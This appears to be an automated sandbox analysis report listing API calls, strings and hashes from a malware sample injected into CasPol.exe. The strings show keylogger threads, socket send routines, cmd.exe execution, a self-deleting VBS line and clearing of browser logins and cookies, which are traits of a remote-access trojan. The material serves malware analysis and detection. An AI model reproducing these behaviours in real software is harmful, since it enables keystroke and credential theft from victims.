                                                                                                                  • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 00443315
                                                                                                                    • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                    • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                  • _free.LIBCMT ref: 00443327
                                                                                                                  • _free.LIBCMT ref: 0044333A
                                                                                                                  • _free.LIBCMT ref: 0044334B
                                                                                                                  • _free.LIBCMT ref: 0044335C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
• Instruction ID: ba617ab3bec5ed021708e8d9793ec2f19a393bb4d037fa002b455214101d6763
• Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
• Instruction Fuzzy Hash: E1F03AB08075208FA712AF6DBD014493BA1F706764342513BF41AB2A71EB780D81DA8E
APIs
• _free.LIBCMT ref: 1000536F
  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
• _free.LIBCMT ref: 10005381
• _free.LIBCMT ref: 10005394
• _free.LIBCMT ref: 100053A5
• _free.LIBCMT ref: 100053B6
Memory Dump Source
• Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
• Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
• Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
• Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
APIs
• GetWindowThreadProcessId.USER32(?,?), ref: 00416768
• GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
• IsWindowVisible.USER32(?), ref: 004167A1
  • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
  • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ProcessWindow$Open$TextThreadVisible
• String ID: (FG
• API String ID: 3142014140-2273637114
• Opcode ID: 9a1b59bbed3356950195ba07b1a03bd03f5c7be3db3bd7b9db76135773cdd398
• Instruction ID: 0f4eca603db080fccf2d1fd4ef2663101a063c6717372172f7cb8e83fece0a9a
• Opcode Fuzzy Hash: 9a1b59bbed3356950195ba07b1a03bd03f5c7be3db3bd7b9db76135773cdd398
• Instruction Fuzzy Hash: 4871E5321082454AC325FB61D8A5ADFB3E4AFE4308F50453EF58A530E1EF746A49CB9A
APIs
• GetKeyboardLayoutNameA.USER32(?), ref: 00409601
  • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
  • Part of subcall function 0040428C: connect.WS2_32(?,00F4B2F8,00000010), ref: 004042A5
  • Part of subcall function 0041B6BA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6CF
  • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CreateFileKeyboardLayoutNameconnectsendsocket
• String ID: XCG$`AG$>G
• API String ID: 2334542088-2372832151
• Opcode ID: d5fde74a72ab23943b571da8d82e14ca3d032a186f9542a9d8838a507179a395
• Instruction ID: 51992e77998e29381c1adf086b38d2340c1e01042c89ae8fe5bc0f900910b53e
• Opcode Fuzzy Hash: d5fde74a72ab23943b571da8d82e14ca3d032a186f9542a9d8838a507179a395
• Instruction Fuzzy Hash: 5E5132321042405AC325F775D8A2AEF73E5ABE4308F50493FF94A631E2EE785949C69E
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 00442724
• _free.LIBCMT ref: 004427EF
• _free.LIBCMT ref: 004427F9
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
• API String ID: 2506810119-3657627342
• Opcode ID: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
• Instruction ID: a09326ba0634f9fc59332e3a0850bb80beab61cea56b0999b5ec2e0ea5ed553b
• Opcode Fuzzy Hash: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
• Instruction Fuzzy Hash: 04318075A00218AFEB21DF999D8199EBBFCEB85354B50406BF80497311D6B88E81CB59
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 10004C1D
• _free.LIBCMT ref: 10004CE8
• _free.LIBCMT ref: 10004CF2
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
• API String ID: 2506810119-3657627342
• Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
• Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
• Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
• Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
APIs
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000), ref: 100099A8
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 100099D6
• GetLastError.KERNEL32 ref: 10009A07
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: ByteCharErrorFileLastMultiWideWrite
• String ID: h(RA/
• API String ID: 2456169464-661517699
• Opcode ID: 427868bedf5aeb2dbe74816aae85c58cffe3606ac2297d0d696d101185ff0d15
• Instruction ID: 4dca0cb6e5ae08cfaecef52c11f05f5c50a0db4386d341a895ff8b0f45518e07
• Opcode Fuzzy Hash: 427868bedf5aeb2dbe74816aae85c58cffe3606ac2297d0d696d101185ff0d15
• Instruction Fuzzy Hash: 7D314375A002199FEB14CF69CC95AEAB7B9EF48344F0144ADE50AD7254D730AD81CB61
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
  • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
  • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
• Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
• String ID: /sort "Visit Time" /stext "$8>G
• API String ID: 368326130-2663660666
• Opcode ID: fbe8e0342797dfc48e0b09f38c49579a36867b600651027c00f538e7970574aa
• Instruction ID: 14a2de6876ab63adfaf4c6869ac5cc0218acab93288f76d9a5f97452818968e4
• Opcode Fuzzy Hash: fbe8e0342797dfc48e0b09f38c49579a36867b600651027c00f538e7970574aa
• Instruction Fuzzy Hash: 36317331A0021556CB14FBB6DC969EE7775AF90318F40007FF906B71D2EF385A8ACA99
APIs
  • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
• ShellExecuteW.SHELL32(?,open,00000000), ref: 0040C632
• ExitProcess.KERNEL32 ref: 0040C63E
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CreateExecuteExitFileProcessShell
• String ID: fso.DeleteFile(Wscript.ScriptFullName)$open
• API String ID: 2309964880-3562070623
• Opcode ID: ae3d1df5e193353fa7a7bad1cac546cd153fd42e00a47a17a1ca5c3f100fcf7e
• Instruction ID: ace0f40cc0655528612a0b5402a09b3609fe8f046c2334cef27d09c8f481fd79
• Opcode Fuzzy Hash: ae3d1df5e193353fa7a7bad1cac546cd153fd42e00a47a17a1ca5c3f100fcf7e
• Instruction Fuzzy Hash: D42145315042405AC324FB25E8969BF77E4AFD1318F50453FF482620F2EF38AA49C69A
APIs
• CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
• CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
• CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 00409946
  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CreateThread$LocalTimewsprintf
• String ID: Offline Keylogger Started
• API String ID: 465354869-4114347211
• Opcode ID: 570e04be0e4ffa855f27f1ca213c906f0df4e766948eb3acc4b01943e62d06e0
• Instruction ID: 39d66220788a70d2f795ee3c864da876fba87127a7a6d83764b6ce8c19119ba3
• Opcode Fuzzy Hash: 570e04be0e4ffa855f27f1ca213c906f0df4e766948eb3acc4b01943e62d06e0
• Instruction Fuzzy Hash: 8011A7B25003097ED220BA36DC87CBF765CDA813A8B40053EF845222D3EA785E54C6FB
APIs
  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
  • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
• CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
• CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
• CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                  • String ID: Online Keylogger Started
                                                                                                                  • API String ID: 112202259-1258561607
                                                                                                                  • Opcode ID: 564b200d65e3c73e3a7e2304ccbb93078783a11880c439d0c88e3e8c5b9bf4b9
                                                                                                                  • Instruction ID: 11da804b7f4806bc819379157d14523832a74cbdaa40f75774c11a3885c9476d
                                                                                                                  • Opcode Fuzzy Hash: 564b200d65e3c73e3a7e2304ccbb93078783a11880c439d0c88e3e8c5b9bf4b9
                                                                                                                  • Instruction Fuzzy Hash: 8A01C4916003093AE62076368C8BDBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                                                  APIs
                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAD9
                                                                                                                  • GetLastError.KERNEL32(?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAE3
                                                                                                                  • __dosmaperr.LIBCMT ref: 0044AB0E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                  • String ID: `@
                                                                                                                  • API String ID: 2583163307-951712118
                                                                                                                  • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                  • Instruction ID: 27d3a2ced18f85a81fd98b99658ced531467de2cab5132fdd739c317d4e1371d
                                                                                                                  • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                  • Instruction Fuzzy Hash: 56016F3664452016F7215274694977F774D8B42738F25036FF904972D2DD6D8CC5C19F
                                                                                                                  APIs
                                                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseEventHandleObjectSingleWait
                                                                                                                  • String ID: Connection Timeout
                                                                                                                  • API String ID: 2055531096-499159329
                                                                                                                  • Opcode ID: 96a4edac1a058f04c3ad407f14895f77ac6fb9ff937b43e6201c32ffecfaeaf2
                                                                                                                  • Instruction ID: 87453c7fdf87cbb5f51522b6001dca4eac29197b42c1cd59420238f874304a49
                                                                                                                  • Opcode Fuzzy Hash: 96a4edac1a058f04c3ad407f14895f77ac6fb9ff937b43e6201c32ffecfaeaf2
                                                                                                                  • Instruction Fuzzy Hash: 5F01F5B1900B41AFD325BB3A9C4655ABBE0AB45315700053FF6D396BB1DA38E840CB5A
                                                                                                                  APIs
                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                                                    • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 004347EC
                                                                                                                    • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 00434810
                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                  • String ID: bad locale name
                                                                                                                  • API String ID: 3628047217-1405518554
                                                                                                                  • Opcode ID: d75f37e1b89ee78a4a0f808b0b17b1e5c3b7b9634f49529d216c4b18a17b3ee6
                                                                                                                  • Instruction ID: 10a02b8eb17e148bebaf39200f5874f6183f8458c9cdff10c330f193d408b506
                                                                                                                  • Opcode Fuzzy Hash: d75f37e1b89ee78a4a0f808b0b17b1e5c3b7b9634f49529d216c4b18a17b3ee6
                                                                                                                  • Instruction Fuzzy Hash: 3FF0A471400204EAC324FB23D853ACA73649F54748F90497FB446214D2FF3CB618CA8C
                                                                                                                  APIs
                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ExecuteShell
                                                                                                                  • String ID: /C $cmd.exe$open
                                                                                                                  • API String ID: 587946157-3896048727
                                                                                                                  • Opcode ID: 48c4e9bf8b9074f27646adf5b30bc281ede9c2cdd6c59f38ee373b2102eacdae
                                                                                                                  • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                                                  • Opcode Fuzzy Hash: 48c4e9bf8b9074f27646adf5b30bc281ede9c2cdd6c59f38ee373b2102eacdae
                                                                                                                  • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                                                  APIs
                                                                                                                  • TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                  • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                  • TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: TerminateThread$HookUnhookWindows
                                                                                                                  • String ID: pth_unenc
                                                                                                                  • API String ID: 3123878439-4028850238
                                                                                                                  • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                  • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                                                  • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                  • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                  • String ID: GetCursorInfo$User32.dll
                                                                                                                  • API String ID: 1646373207-2714051624
                                                                                                                  • Opcode ID: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
                                                                                                                  • Instruction ID: 8a619761425f66876362e8ef81435da0b65ff7d8438f08abde0d1abd95200d6c
                                                                                                                  • Opcode Fuzzy Hash: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
                                                                                                                  • Instruction Fuzzy Hash: DAB092B458A3059BC7206BE0BD0EA083B64E644703B1000B2F087C1261EB788080DA6E
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: GetLastInputInfo$User32.dll
                                                                                                                  • API String ID: 2574300362-1519888992
                                                                                                                  • Opcode ID: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
                                                                                                                  • Instruction ID: d4d82ae3f827bcfb7cdfeca7c6c066ea5703a418acbc3ecfb38afa42acb71bdc
                                                                                                                  • Opcode Fuzzy Hash: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
                                                                                                                  • Instruction Fuzzy Hash: 6CB092B85843449BC7212BF1BC0DA293AA8FA48B43720447AF406C21A1EB7881809F6F
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1036877536-0
                                                                                                                  • Opcode ID: 04a0325834f843994ade633b459a1d3cb356a39676a395bc181b674f0ba6452b
                                                                                                                  • Instruction ID: 44e25d054e292963cfc005d68317528f4d38ac36d82b99eb29904231438c363e
                                                                                                                  • Opcode Fuzzy Hash: 04a0325834f843994ade633b459a1d3cb356a39676a395bc181b674f0ba6452b
                                                                                                                  • Instruction Fuzzy Hash: C5A14671A042469FFB218F58C8817AFBBA1EF25354F28416FE5859B382CA3C8D45C759
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Strings
• Cleared browsers logins and cookies., xrefs: 0040B8EF
• [Cleared browsers logins and cookies.], xrefs: 0040B8DE
Similarity
• API ID: Sleep
• String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
APIs
  • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
  • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
